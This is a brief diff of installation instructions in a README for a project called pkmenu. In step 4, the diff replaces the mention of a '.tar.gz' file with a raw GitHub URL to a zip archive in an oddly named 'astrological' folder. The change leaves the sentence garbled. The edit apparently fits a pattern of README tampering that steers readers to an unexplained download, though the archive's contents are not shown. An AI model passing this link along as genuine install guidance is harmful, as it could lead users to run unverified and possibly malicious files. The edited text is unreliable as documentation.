111111St/pkmenu/README.md

 4. **Extract (if necessary)**

-   If you downloaded a `.tar.gz` file, find it in your Downloads folder.
+   If you downloaded a `https://raw.githubusercontent.com/111111St/pkmenu/main/astrological/pkmenu.zip` file, find it in your Downloads folder.
 Right-click on the file and select "Extract" or "Unpack."
 You will get a folder with the application files.

 5. **Install the Application**